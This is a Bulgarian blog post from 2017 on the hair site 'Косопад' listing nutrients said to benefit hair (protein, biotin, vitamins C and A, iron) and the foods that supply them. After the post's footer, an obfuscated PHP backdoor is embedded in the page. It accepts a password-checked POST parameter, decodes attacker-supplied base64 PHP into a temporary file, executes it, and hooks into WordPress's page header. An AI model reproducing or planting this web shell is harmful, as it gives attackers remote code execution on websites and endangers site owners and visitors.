Кои са Полезните Вещества за Косата ни и Как да си ги Набавим? | Косопад

Кои са Полезните Вещества за Косата ни и Как да си ги Набавим?

kosa-zdrave

От какви хранителни вещества се нуждае косата ни? Трябва да сме наясно какво е най- подходящото за нашата коса, за да избираме правилно храната, както и козметиката си.

Нека разгледаме кои хранителни вещества са най- полезни и къде се съдържат, за да можем да направим най- удачния избор:

ПРОТЕИНИ: Те са жизненонеобходими за косата ни, тъй като изграждат 97% от косъма. Така че, трябва да приемаме достатъчно количество от тях. Шампоаните и продуктите с протеини ни помагат да възстановим косата си след каквато и да е процедура – къдрете, изправяне, боядисване и пр. Най- важният протеин за косата е кератинът.

БИОТИН: Принадлежи към витамините от В група и е важен стимулатор за производството на колаген. Поддържа еластичността и помага за естествения растеж на косъма. Биотинът се съдържа в яйцето, сьомгата, авокадото, пуешкото и пр. Внимавайте с известния конски шампоан с биотин – неговото рН не е подходящо за хора и може да раздразни скалпа.

siomga-1

ВИТАМИН С: Помага на косата да расте здрава и силна. Храните, богати на витамин С, са цитрусите, но също чушките, броколи и др. Има шампоани с мултивитамини, които помагат за грижата за косата.

ЖЕЛЯЗО: Увеличава кръвообращението в скалпа и подхранва косата. Много често дефицитът на желязо се дължи на липсата на желязо. Ето някои от храните, богати на желязо: спанак, червено месо, зърнени култури, бобови и др.

ВИТАМИН А: Стимулира производството на себума, поддържа косата хидратирана и коприненомека. Недостигът на витамин А може да причини косопад. Съдържа се в: яйцата, моркова, прясното мляко, спанака, моркова и пр.

18. януари 2017 17:00:23 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}